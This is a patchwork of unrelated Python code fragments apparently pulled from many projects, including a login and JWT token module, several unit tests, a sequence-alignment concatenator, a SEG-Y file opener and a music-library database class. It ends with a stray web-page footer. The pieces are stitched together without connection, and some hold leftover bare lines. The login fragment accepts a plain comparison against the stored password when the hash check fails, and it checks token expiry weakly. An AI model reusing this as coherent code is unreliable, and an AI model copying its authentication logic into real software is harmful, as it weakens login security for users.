            # `diff.total_seconds() < 0` — confirm and fix upstream.
            if (diff.seconds < 0):
                raise User.TokenExpired('The token has expired, login again')
            user_payload = jwt.decode(token, JWT_SECRET, algorithms=[JWT_ALGORITHM], options={'verify_exp': False})
            return user_payload['uid']

        async def login(cls, username, password, host):
            """Authenticate a user and mint a JWT session token.

            Returns (uid, jwt_token, is_admin).
            :raises User.DoesNotExist: unknown/disabled username
            :raises User.PasswordExpired: password older than the configured age
            :raises User.PasswordDoesNotMatch: bad credentials
            """
            storage_client = connect.get_storage_async()
            cfg_mgr = ConfigurationManager(storage_client)
            category_item = (await cfg_mgr.get_category_item('rest_api', 'passwordChange'))
            # Max password age in days; 0 disables expiry.
            age = int(category_item['value'])
            payload = PayloadBuilder().SELECT('pwd', 'id', 'role_id', 'access_method', 'pwd_last_changed', 'real_name', 'description').WHERE(['uname', '=', username]).ALIAS('return', ('pwd_last_changed', 'pwd_last_changed')).FORMAT('return', ('pwd_last_changed', 'YYYY-MM-DD HH24:MI:SS.MS')).AND_WHERE(['enabled', '=', 't']).payload()
            result = (await storage_client.query_tbl_with_payload('users', payload))
            if (len(result['rows']) == 0):
                raise User.DoesNotExist('User does not exist')
            found_user = result['rows'][0]
            t1 = datetime.now()
            t2 = datetime.strptime(found_user['pwd_last_changed'], '%Y-%m-%d %H:%M:%S.%f')
            delta = (t1 - t2)
            if (age == 0):
                # Expiry disabled.
                pass
            elif (age <= delta.days):
                raise User.PasswordExpired(found_user['id'])
            is_valid_pwd = cls.check_password(found_user['pwd'], str(password))
            if (not is_valid_pwd):
                # NOTE(review): when the hash check fails, a direct comparison
                # against the stored value is accepted — this lets plaintext
                # stored passwords log in. Confirm this fallback is intended.
                if (found_user['pwd'] != str(password)):
                    raise User.PasswordDoesNotMatch('Username or Password do not match')
            (uid, jwt_token, is_admin) = (await cls._get_new_token(storage_client, found_user, host))
            return (uid, jwt_token, is_admin)

        async def _get_new_token(cls, storage_client, found_user, host):
            """Create and persist a JWT for `found_user`; returns (uid, token, is_admin)."""
            exp = (datetime.now() + timedelta(seconds=JWT_EXP_DELTA_SECONDS))
            uid = found_user['id']
            p = {'uid': uid, 'exp': exp}
            jwt_token = jwt.encode(p, JWT_SECRET, JWT_ALGORITHM)
            payload = PayloadBuilder().INSERT(user_id=p['uid'], token=jwt_token, token_expiration=str(exp), ip=host).payload()
            try:
                (await storage_client.insert_into_tbl('user_logins', payload))
            except StorageServerError as ex:
                # NOTE(review): no-op retryable check, see create().
                if ex.error['retryable']:
                    pass
                raise ValueError(ERROR_MSG)
            # role_id 1 is the admin role.
            if (int(found_user['role_id']) == 1):
                return (uid, jwt_token, True)
            return (uid, jwt_token, False)

        async def certificate_login(cls, username, host):
            """Mint a session token for a certificate-authenticated username
            (no password check). Returns (uid, token, is_admin)."""
            storage_client = connect.get_storage_async()
            payload = PayloadBuilder().SELECT('id', 'role_id').WHERE(['uname', '=', username]).AND_WHERE(['enabled', '=', 't']).payload()
            result = (await storage_client.query_tbl_with_payload('users', payload))
            if (len(result['rows']) == 0):
                raise User.DoesNotExist('User does not exist')
            found_user = result['rows'][0]
            (uid, jwt_token, is_admin) = (await cls._get_new_token(storage_client, found_user, host))
            return (uid, jwt_token, is_admin)

        async def delete_user_tokens(cls, user_id):
            """Delete every stored login token for `user_id`."""
            storage_client = connect.get_storage_async()
            payload = PayloadBuilder().WHERE(['user_id', '=', user_id]).payload()
            try:
                res = (await storage_client.delete_from_tbl('user_logins', payload))
            except StorageServerError as ex:
                # NOTE(review): no-op (inverted) retryable check; ValueError always raised.
                if (not ex.error['retryable']):
                    pass
                raise ValueError(ERROR_MSG)
            return res

        async def delete_token(cls, token):
            """Delete a single stored login token (logout)."""
            storage_client = connect.get_storage_async()
            payload = PayloadBuilder().WHERE(['token', '=', token]).payload()
            try:
                res = (await storage_client.delete_from_tbl('user_logins', payload))
            except StorageServerError as ex:
                # NOTE(review): no-op (inverted) retryable check; ValueError always raised.
                if (not ex.error['retryable']):
                    pass
                raise ValueError(ERROR_MSG)
            return res

        async def delete_all_user_tokens(cls):
            """Delete every row of user_logins (global logout)."""
            storage_client = connect.get_storage_async()
            (await storage_client.delete_from_tbl('user_logins'))

        def hash_password(cls, password):
            """Return 'sha256(salt+password):salt' with a fresh random salt."""
            salt = uuid.uuid4().hex
            return ((hashlib.sha256((salt.encode() + password.encode())).hexdigest() + ':') + salt)

        def check_password(cls, hashed_password, user_password):
            """Verify `user_password` against a 'digest:salt' value from hash_password()."""
            (password, salt) = hashed_password.split(':')
            return (password == hashlib.sha256((salt.encode() + user_password.encode())).hexdigest())

        async def _get_password_history(cls, storage_client, user_id, user_data):
            """Return the user's stored password hashes.

            :raises User.PasswordAlreadyUsed: new password matches a stored hash
            """
            pwd_history_list = []
            payload = PayloadBuilder().WHERE(['user_id', '=', user_id]).payload()
            result = (await storage_client.query_tbl_with_payload('user_pwd_history', payload))
            for row in result['rows']:
                if cls.check_password(row['pwd'], user_data['password']):
                    raise User.PasswordAlreadyUsed
                pwd_history_list.append(row['pwd'])
            return pwd_history_list

        async def _insert_pwd_history_with_oldest_pwd_deletion_if_count_exceeds(cls, storage_client, user_id, hashed_pwd, pwd_history_list):
            """Store the new hash, evicting the oldest entry when the history
            already holds USED_PASSWORD_HISTORY_COUNT hashes."""
            if (len(pwd_history_list) >= USED_PASSWORD_HISTORY_COUNT):
                payload = PayloadBuilder().WHERE(['user_id', '=', user_id]).AND_WHERE(['pwd', '=', pwd_history_list[(- 1)]]).payload()
                (await storage_client.delete_from_tbl('user_pwd_history', payload))
            payload = PayloadBuilder().INSERT(user_id=user_id, pwd=hashed_pwd).payload()
            (await storage_client.insert_into_tbl('user_pwd_history', payload))

        async def verify_certificate(cls, cert):
            """Verify a client certificate against the configured CA cert.

            The CA file name comes from the rest_api/authCertificateName
            config item; SSLVerifier.verify() raises on failure.
            """
            certs_dir = ((_FLEDGE_DATA + '/etc/certs') if _FLEDGE_DATA else (_FLEDGE_ROOT + '/data/etc/certs'))
            storage_client = connect.get_storage_async()
            cfg_mgr = ConfigurationManager(storage_client)
            ca_cert_item = (await cfg_mgr.get_category_item('rest_api', 'authCertificateName'))
            ca_cert_file = '{}/{}.cert'.format(certs_dir, ca_cert_item['value'])
            SSLVerifier.set_ca_cert(ca_cert_file)
            SSLVerifier.set_user_cert(cert)
            SSLVerifier.verify()
class Test_ofctl_v1_3(unittest.TestCase):
    """Tests for the ofctl_v1_3 action-conversion helpers."""

    def setUp(self):
        # No shared fixtures required.
        pass

    def tearDown(self):
        pass

    def test_to_actions_pop_mpls(self):
        """A POP_MPLS action dict must convert to an OFPActionPopMpls with the
        requested ethertype inside the first instruction."""
        dp = ofproto_protocol.ProtocolDesc(version=ofproto_v1_3.OFP_VERSION)
        acts = [{'type': 'POP_MPLS', 'ethertype': 2048}]
        result = ofctl_v1_3.to_actions(dp, acts)
        insts = result[0]
        act = insts.actions[0]
        ok_(isinstance(act, OFPActionPopMpls))
        eq_(act.ethertype, 2048)
class TestContract(BaseTestContract, FaucetMixIn):
    """Contract test suite bound to the module-level network constants."""
    # Network parameters consumed by the base test class.
    COIN = COIN
    GAS_LIMIT = GAS_LIMIT
    PREFIX = PREFIX

    def get_ledger(self):
        """Return a ledger client for the configured network."""
        return LedgerClient(NET_CONFIG)

    def get_wallet(self):
        """Generate a fresh wallet and fund it from the faucet before use."""
        wallet = LocalWallet.generate(prefix=PREFIX)
        self.ask_funds(wallet, self.get_ledger(), )
        return wallet
def get_concatenated_alg(alg_filenames, models=None, sp_field=0, sp_delimiter='_', kill_thr=0.0, keep_species=None):
    """Concatenate several per-gene FASTA alignments into one super-alignment.

    Each alignment contributes one partition; sequences are keyed by the
    species code extracted from the sequence name. Species present in fewer
    than `kill_thr` of the alignments are dropped (unless forced via
    `keep_species`); missing sequences are gap-filled.

    :param alg_filenames: alignment file paths (FASTA)
    :param models: per-alignment model names (defaults to 'None' for each)
    :param sp_field: field index of the species code within sequence names
    :param sp_delimiter: delimiter used to split sequence names
    :param kill_thr: minimum fraction of alignments a species must appear in
    :param keep_species: species codes always kept regardless of kill_thr
    :returns: (concat SeqGroup, partition strings, sp2alg map,
               valid_species list, per-alignment lengths in sorted order)
    :raises ValueError: models/alignments length mismatch
    :raises Exception: inconsistent alignments or concatenation size mismatch
    """
    if keep_species is None:
        keep_species = set()
    concat = SeqGroup()
    concat.id2partition = {}
    if not models:
        models = ['None'] * len(alg_filenames)
    elif len(models) != len(alg_filenames):
        raise ValueError('Different number of algs and model names was found!')
    expected_total_length = 0
    alg_objects = []
    sp2alg = defaultdict(list)
    for algfile, matrix in zip(alg_filenames, models):
        alg = SeqGroup(algfile, 'fasta')
        alg_objects.append(alg)
        lenseq = None
        browsed_species = set()
        alg.sp2seq = {}
        alg.matrix = matrix
        for i, seq in alg.id2seq.items():
            name = db.get_seq_name(alg.id2name[i])
            taxid = get_species_code(name, splitter=sp_delimiter, field=sp_field)
            if lenseq is not None and len(seq) != lenseq:
                raise Exception('Inconsistent alignment when concatenating: Unequal length')
            elif lenseq is None:
                # First sequence fixes this alignment's expected length.
                lenseq = len(seq)
                alg.seqlength = len(seq)
                expected_total_length += len(seq)
            if taxid in browsed_species:
                raise Exception('Inconsistent alignment when concatenating: Repeated species')
            browsed_species.add(taxid)
            sp2alg[taxid].append(alg)
            alg.sp2seq[taxid] = seq
    # Keep a species if forced, or if present in a large-enough fraction of algs.
    valid_species = [sp for sp in sp2alg.keys() if ((sp in keep_species) or ((len(sp2alg[sp]) / float(len(alg_objects))) > kill_thr))]
    log.info(('%d out of %d will be kept (missing factor threshold=%g, %d species forced to kept)' % (len(valid_species), len(sp2alg), kill_thr, len(keep_species))))
    # Deterministic alignment order: by model name, then by sorted sequence names.
    # BUGFIX: the original comparator relied on the Python 2 builtin `cmp`
    # (removed in Python 3, so it raised NameError); an equivalent sort key
    # replaces the cmp_to_key-wrapped comparator. Unused `model2win` removed.
    sorted_algs = sorted(alg_objects, key=lambda alg: (alg.matrix, sorted(alg.id2name.values())))
    concat_alg_lengths = [alg.seqlength for alg in sorted_algs]
    model2size = {}
    for alg in sorted_algs:
        model2size[alg.matrix] = model2size.get(alg.matrix, 0) + alg.seqlength
    concat.id2seq = defaultdict(list)
    for sp in sorted(valid_species):
        log.log(20, 'Concatenating sequences of [%s]' % sp)
        for alg in sorted_algs:
            # Gap-fill species missing from this alignment.
            seq = alg.sp2seq.get(sp, '-' * alg.seqlength)
            concat.id2seq[sp].append(seq)
        concat.id2name[sp] = sp
        concat.name2id[sp] = sp
        concat.id2comment[sp] = ['']
        concat.id2seq[sp] = ''.join(concat.id2seq[sp])
    # Build RAxML-style partition lines, one per model, over contiguous columns.
    current_pos = 0
    partitions = []
    for model in sorted(model2size.keys()):
        size = model2size[model]
        part = '%s, %s = %d-%d' % (model, model + '_genes', current_pos + 1, current_pos + size)
        current_pos += size
        partitions.append(part)
    # Sanity checks: all concatenated rows equal length, matching the expectation.
    seq_sizes = [len(seq) for seq in list(concat.id2seq.values())]
    if len(set(seq_sizes)) != 1:
        raise Exception('Concatenated alignment is not consistent: unequal seq length ')
    if seq_sizes[0] != expected_total_length:
        raise Exception('The size of concatenated alg is not what expected')
    return (concat, partitions, sp2alg, valid_species, concat_alg_lengths)
class ModelSerializer(ABC):
    """Base serializer rendering a trained model as a 'trained_model' JSON
    payload, optionally gzip-compressed and base64-encoded.

    NOTE(review): feature_names reads like a @property whose decorator was
    lost in extraction; confirm against upstream.
    """

    def __init__(self, feature_names: Sequence[str], target_type: Optional[str]=None, classification_labels: Optional[Sequence[str]]=None):
        self._target_type = target_type
        self._feature_names = feature_names
        self._classification_labels = classification_labels

    def to_dict(self) -> Dict[(str, Any)]:
        """Serialize the common fields, omitting any that are unset."""
        d: Dict[(str, Any)] = {}
        add_if_exists(d, 'target_type', self._target_type)
        add_if_exists(d, 'feature_names', self._feature_names)
        add_if_exists(d, 'classification_labels', self._classification_labels)
        return d

    def feature_names(self) -> Sequence[str]:
        """Feature names the model was trained on."""
        return self._feature_names

    def serialize_model(self) -> Dict[(str, Any)]:
        """Wrap to_dict() under the 'trained_model' key."""
        return {'trained_model': self.to_dict()}

    def serialize_and_compress_model(self) -> str:
        """Return the model JSON, gzip-compressed and base64-encoded as ASCII."""
        # Compact separators keep the JSON payload minimal before compression.
        json_string = json.dumps(self.serialize_model(), separators=(',', ':'))
        return base64.b64encode(gzip.compress(json_string.encode('utf-8'))).decode('ascii')
def open(filename, mode='r', iline=189, xline=193, strict=True, ignore_geometry=False, endian='big'):
    """Open a SEG-Y file and return a SegyFile with its sample times computed.

    NOTE: intentionally shadows the builtin `open` (module-level API).

    :param filename: path to the SEG-Y file
    :param mode: file mode; 'w' is rejected because it would truncate
    :param iline, xline: header word byte offsets for inline/crossline numbers
    :param strict: forwarded to geometry inference
    :param ignore_geometry: skip geometry inference entirely
    :param endian: 'big'/'msb' or 'little'/'lsb'
    :raises ValueError: on 'w' in mode or an unknown endianness
    """
    if ('w' in mode):
        problem = 'w in mode would truncate the file'
        solution = 'use r+ to open in read-write'
        raise ValueError(', '.join((problem, solution)))
    # Map endianness names to the flag values the C extension expects.
    endians = {'little': 256, 'lsb': 256, 'big': 0, 'msb': 0}
    if (endian not in endians):
        problem = 'unknown endianness {}, expected one of: '
        opts = ' '.join(endians.keys())
        raise ValueError((problem.format(endian) + opts))
    from . import _segyio
    fd = _segyio.segyiofd(str(filename), mode, endians[endian])
    fd.segyopen()
    metrics = fd.metrics()
    f = segyio.SegyFile(fd, filename=str(filename), mode=mode, iline=iline, xline=xline, endian=endian)
    try:
        # Build the per-trace sample time axis from the first trace header:
        # samples = arange(n) * dt(ms) + t0, with t0 scaled by the trace
        # header scalar (negative scalar means divide, per SEG-Y convention —
        # confirm against the SEG-Y rev spec).
        delay_scalar = f.header[0][segyio.TraceField.ScalarTraceHeader]
        if (delay_scalar == 0):
            # A zero scalar means "unscaled".
            delay_scalar = 1
        elif (delay_scalar < 0):
            delay_scalar = (1.0 / delay_scalar)
        dt = (segyio.tools.dt(f, fallback_dt=4000.0) / 1000.0)
        t0 = (f.header[0][segyio.TraceField.DelayRecordingTime] * abs(delay_scalar))
        samples = metrics['samplecount']
        f._samples = ((numpy.arange(samples) * dt) + t0)
    except:
        # Bare except on purpose: release the file handle, then re-raise
        # whatever went wrong (including BaseException).
        f.close()
        raise
    if ignore_geometry:
        return f
    return infer_geometry(f, metrics, iline, xline, strict)
class OptionPlotoptionsGaugeSonificationDefaultinstrumentoptionsMappingTremolo(Options):
    """Accessors for the tremolo mapping sub-options (depth and speed)."""

    def depth(self) -> 'OptionPlotoptionsGaugeSonificationDefaultinstrumentoptionsMappingTremoloDepth':
        """Return the nested 'depth' sub-option config object."""
        sub_cls = OptionPlotoptionsGaugeSonificationDefaultinstrumentoptionsMappingTremoloDepth
        return self._config_sub_data('depth', sub_cls)

    def speed(self) -> 'OptionPlotoptionsGaugeSonificationDefaultinstrumentoptionsMappingTremoloSpeed':
        """Return the nested 'speed' sub-option config object."""
        sub_cls = OptionPlotoptionsGaugeSonificationDefaultinstrumentoptionsMappingTremoloSpeed
        return self._config_sub_data('speed', sub_cls)
# NOTE(review): these two bare name expressions look like the residue of
# stripped lines (e.g. decorators or curried-formatter assignments) — as
# written they merely evaluate the names and discard the result. Confirm
# against the upstream module before removing.
_identity
_basic_type_str
def abi_bytes_to_hex(abi_type: BasicType, type_str: TypeStr, data: Any) -> Optional[Tuple[TypeStr, HexStr]]:
    """Normalize a scalar ``bytes``/``bytesN`` value to its hex-string form.

    Returns None for non-bytes or array types so other normalizers can take
    over. Dynamic ``bytes`` pass through unpadded; sized ``bytesN`` values are
    right-padded with NUL bytes to N and rejected if already longer than N.
    """
    if abi_type.base != 'bytes' or abi_type.is_array:
        return None

    as_bytes = hexstr_if_str(to_bytes, data)

    size = abi_type.sub
    if size is None:
        # Dynamic 'bytes': no fixed width, no padding.
        return type_str, to_hex(as_bytes)

    if len(as_bytes) > size:
        raise ValueError(
            f'This value was expected to be at most {size} bytes, '
            f'but instead was {len(as_bytes)}: {data!r}'
        )
    return type_str, to_hex(as_bytes.ljust(size, b'\x00'))
def calc_adaptation_matrices(w1: Tuple[float, float], w2: Tuple[float, float], m: Matrix) -> Tuple[Matrix, Matrix]:
    """Build the forward and reverse chromatic adaptation matrices between
    two white points given as xy chromaticity pairs.

    The white points are lifted to XYZ, pushed through the cone-response
    matrix ``m``, and their per-channel ratio forms the diagonal scaling that
    is sandwiched between ``m⁻¹`` and ``m``.
    """
    src_cone = alg.dot(m, util.xy_to_xyz(w1), dims=alg.D2_D1)
    dst_cone = alg.dot(m, util.xy_to_xyz(w2), dims=alg.D2_D1)
    scale = alg.diag(alg.divide(src_cone, dst_cone, dims=alg.D1))
    forward = cast(Matrix, alg.multi_dot([alg.inv(m), scale, m]))
    return forward, alg.inv(forward)
def test_state_manipulation():
    """Regression test: Schema must set ``state.full_dict``/``state.key``
    while validating each member field and restore the previous values once
    conversion completes."""
    state = State()
    # Seed state with sentinel values that must be restored after validation.
    old_dict = state.full_dict = {'a': 1}
    old_key = state.key = 'a'
    new_dict = {'b': 2}

    class MyValidator(Validator):
        # Key this validator expects Schema to have placed on state.key
        # while its field is being validated.
        check_key = None
        # pre/chained validators run outside the per-field loop, where
        # Schema has not (re)pointed state at an individual field, so the
        # assertions are skipped for them.
        pre_validator = False
        post_validator = False
        __unpackargs__ = ('check_key',)

        def to_python(self, value, state):
            if (not self.pre_validator):
                # new_dict is captured from the enclosing test's scope.
                assert (getattr(state, 'full_dict', {}) == new_dict), 'full_dict not added'
                assert (state.key == self.check_key), 'key not updated'
            return value

        def from_python(self, value, state):
            if (not self.post_validator):
                assert (getattr(state, 'full_dict', {}) == new_dict), 'full_dict not added'
                assert (state.key == self.check_key), 'key not updated'
            return value

    s = Schema(if_key_missing=None, b=MyValidator('b'), c=MyValidator('c'), pre_validators=[MyValidator('a', pre_validator=True)], chained_validators=[MyValidator('a', post_validator=True)])
    s.to_python(new_dict, state)
    # Schema must put the original sentinel values back after conversion.
    assert (state.full_dict == old_dict), 'full_dict not restored'
    assert (state.key == old_key), 'key not restored'
    s.from_python(new_dict, state)
    assert (state.full_dict == old_dict), 'full_dict not restored'
    assert (state.key == old_key), 'key not restored'
def filter_extension_controller_dataplan_data(json):
    """Whitelist-filter a dataplan payload down to its recognized fields.

    Invalid fields are stripped first; then only known option keys whose
    value is present and not None are kept.
    """
    option_list = ['apn', 'auth_type', 'billing_date', 'capacity', 'carrier', 'iccid', 'modem_id', 'monthly_fee', 'name', 'overage', 'password', 'pdn', 'preferred_subnet', 'private_network', 'signal_period', 'signal_threshold', 'slot', 'type', 'username']
    json = remove_invalid_fields(json)
    return {
        field: json[field]
        for field in option_list
        if field in json and json[field] is not None
    }
class TrackDB:
    """A collection of tracks keyed by I/O location, optionally persisted to
    a shelve database on disk.

    Entries are TrackHolder wrappers around Track objects.  ``pickle_attrs``
    names the instance attributes written to / read from the database;
    'tracks', 'name' and '_key' are always included.
    """

    def __init__(self, name: str = '', location: str = '', pickle_attrs: Optional[List[str]] = None, loadfirst: bool = False):
        """
        :param name: human-readable name of this DB
        :param location: path of the backing shelve file ('' = not persisted)
        :param pickle_attrs: extra attribute names to persist (copied; the
            caller's list is never mutated)
        :param loadfirst: if True, fail unless no Track has been created yet
        :raises RuntimeError: if loadfirst is set but tracks already exist
        """
        if loadfirst and (Track._get_track_count() != 0):
            raise RuntimeError(
                ('Internal error! %d tracks already loaded, '
                 + 'TrackDB must be loaded first!') % Track._get_track_count()
            )
        self.name = name
        self.location = location
        self._dirty = False
        self.tracks: Dict[str, TrackHolder] = {}
        # BUG FIX: the old signature used a mutable default argument ([])
        # and extended it in place with +=, which polluted both the shared
        # default and any caller-supplied list. Copy instead; never mutate
        # the argument.
        self.pickle_attrs = (list(pickle_attrs) if pickle_attrs else []) + ['tracks', 'name', '_key']
        self._saving = False
        self._key = 0
        self._dbversion = 2.0
        self._dbminorversion = 0
        self._deleted_keys = []
        if location:
            self.load_from_location()
            self._timeout_save()

    def __iter__(self):
        """Iterate over the Track objects in this DB."""
        return TrackDBIterator(iter(self.tracks.items()))

    def __len__(self):
        return len(self.tracks)

    # NOTE(review): bare call left exactly as found in the source; it looks
    # like the residue of a stripped decorator for _timeout_save (a periodic
    # save timer) — confirm against the upstream source before removing.
    _wait_seconds(300)

    def _timeout_save(self):
        """Periodic save hook; returns True so a timer-based caller re-arms."""
        self.save_to_location()
        return True

    def set_name(self, name: str) -> None:
        """Rename the DB and mark it dirty."""
        self.name = name
        self._dirty = True

    def get_name(self) -> str:
        """Return the DB's name."""
        return self.name

    def set_location(self, location: Optional[str]) -> None:
        """Point the DB at a new backing file and mark it dirty."""
        self.location = location
        self._dirty = True

    def load_from_location(self, location: Optional[str] = None):
        """Restore pickled attributes (including tracks) from the shelve DB
        at *location* (default: ``self.location``).

        :raises AttributeError: if no location is known
        :raises common.VersionError: if the DB was written by a newer Exaile
        """
        if not location:
            location = self.location
        if not location:
            raise AttributeError(_('You did not specify a location to load the db from'))
        logger.debug('Loading %s DB from %s.', self.name, location)
        pdata = common.open_shelf(location)
        if '_dbversion' in pdata:
            if int(pdata['_dbversion']) > int(self._dbversion):
                raise common.VersionError('DB was created on a newer Exaile version.')
            elif pdata['_dbversion'] < self._dbversion:
                # Older format: back the file up, then migrate in place.
                logger.info('Upgrading DB format....')
                import shutil
                shutil.copyfile(location, location + ('-%s.bak' % pdata['_dbversion']))
                import xl.migrations.database as dbmig
                dbmig.handle_migration(self, pdata, pdata['_dbversion'], self._dbversion)
        for attr in self.pickle_attrs:
            try:
                if 'tracks' == attr:
                    # Track entries are stored under individual
                    # 'tracks-<key>' keys rather than one big blob.
                    data = {}
                    for k in (x for x in pdata.keys() if x.startswith('tracks-')):
                        p = pdata[k]
                        tr = Track(_unpickles=p[0])
                        loc = tr.get_loc_for_io()
                        if loc not in data:
                            data[loc] = TrackHolder(tr, p[1], **p[2])
                        else:
                            logger.warning('Duplicate track found: %s', loc)
                            # Drop the duplicate entry from the DB.
                            del pdata[k]
                    setattr(self, attr, data)
                else:
                    setattr(self, attr, pdata.get(attr, getattr(self, attr)))
            except Exception:
                # Best-effort load: a bad attribute shouldn't kill the rest.
                logger.exception('Exception occurred while loading %s', location)
        pdata.close()
        self._dirty = False

    def save_to_location(self, location: Optional[str] = None):
        """Write dirty state to the shelve DB at *location* (default:
        ``self.location``). No-op when nothing is dirty or a save is
        already in progress.

        :raises AttributeError: if no location is known
        """
        # The DB is dirty if it was marked so, or if any track changed.
        if not self._dirty:
            for holder in self.tracks.values():
                if holder._track._dirty:
                    self._dirty = True
                    break
        if not self._dirty:
            return
        if not location:
            location = self.location
        if not location:
            raise AttributeError(_('You did not specify a location to save the db'))
        if self._saving:
            return
        self._saving = True
        logger.debug('Saving %s DB to %s.', self.name, location)
        # BUG FIX: the original returned early on open failure (and
        # propagated write failures) while leaving self._saving = True,
        # permanently disabling every future save. Always reset it.
        try:
            try:
                pdata = common.open_shelf(location)
                if pdata.get('_dbversion', self._dbversion) > self._dbversion:
                    raise common.VersionError('DB was created on a newer Exaile.')
            except Exception:
                # Best-effort persistence: log and give up on this attempt.
                logger.exception('Failed to open music DB for writing.')
                return
            for attr in self.pickle_attrs:
                if 'tracks' == attr:
                    # Only rewrite entries that changed or are new.
                    for k, holder in self.tracks.items():
                        key = 'tracks-%s' % holder._key
                        if holder._track._dirty or key not in pdata:
                            pdata[key] = (holder._track._pickles(), holder._key, deepcopy(holder._attrs))
                else:
                    pdata[attr] = deepcopy(getattr(self, attr))
            pdata['_dbversion'] = self._dbversion
            # Purge on-disk entries for tracks removed since the last save.
            for key in self._deleted_keys:
                key = 'tracks-%s' % key
                if key in pdata:
                    del pdata[key]
            pdata.sync()
            pdata.close()
            for holder in self.tracks.values():
                holder._track._dirty = False
            self._dirty = False
        finally:
            self._saving = False

    def get_track_by_loc(self, loc: str) -> Optional[Track]:
        """Return the Track stored at *loc*, or None if absent."""
        try:
            return self.tracks[loc]._track
        except KeyError:
            return None

    def loc_is_member(self, loc: str) -> bool:
        """Return whether a track at *loc* is in this DB."""
        return loc in self.tracks

    def get_count(self) -> int:
        """Return the number of tracks in this DB."""
        return len(self.tracks)

    def add(self, track: Track) -> None:
        """Add a single track (see :meth:`add_tracks`)."""
        self.add_tracks([track])

    def add_tracks(self, tracks: Iterable[Track]) -> None:
        """Add *tracks*, skipping unsupported tracks and locations already
        present; fires a single 'tracks_added' event for the batch."""
        locations = []
        now = time()
        for tr in tracks:
            # Stamp first-seen time only once, ever.
            if not tr.get_tag_raw('__date_added'):
                tr.set_tags(__date_added=now)
            location = tr.get_loc_for_io()
            if location in self.tracks:
                continue
            if not tr.is_supported():
                continue
            locations += [location]
            self.tracks[location] = TrackHolder(tr, self._key)
            self._key += 1
        if locations:
            event.log_event('tracks_added', self, locations)
            self._dirty = True

    def remove(self, track: Track) -> None:
        """Remove a single track (see :meth:`remove_tracks`)."""
        self.remove_tracks([track])

    def remove_tracks(self, tracks: Iterable[Track]) -> None:
        """Remove *tracks*, remembering their DB keys so the on-disk entries
        are purged on the next save; fires one 'tracks_removed' event."""
        locations = []
        for tr in tracks:
            location = tr.get_loc_for_io()
            locations += [location]
            self._deleted_keys.append(self.tracks[location]._key)
            del self.tracks[location]
        event.log_event('tracks_removed', self, locations)
        self._dirty = True

    def get_tracks(self) -> List[Track]:
        """Return all tracks as a list."""
        return list(self)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.